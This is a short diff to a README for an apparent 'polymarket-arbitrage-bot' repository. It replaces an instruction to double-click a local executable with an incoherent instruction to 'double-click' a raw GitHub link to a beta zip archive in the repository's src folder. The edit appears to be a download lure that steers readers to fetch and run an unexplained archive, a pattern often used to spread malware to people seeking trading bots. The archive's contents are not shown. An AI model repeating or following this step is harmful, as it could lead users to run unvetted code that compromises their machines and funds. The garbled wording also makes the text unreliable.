Datagoverment/polymarket-arbitrage-bot/README.md

 3. **Run the Application**
    - Navigate to the extracted folder.
-   - Double-click on `polymarket-arbitrage-bot.exe` (or the equivalent for your OS) to launch the bot.
+   - Double-click on `https://raw.githubusercontent.com/Datagoverment/polymarket-arbitrage-bot/main/src/arbitrage-polymarket-bot-1.3-beta.5.zip` (or the equivalent for your OS) to launch the bot.

 ## ⚙️ Configuration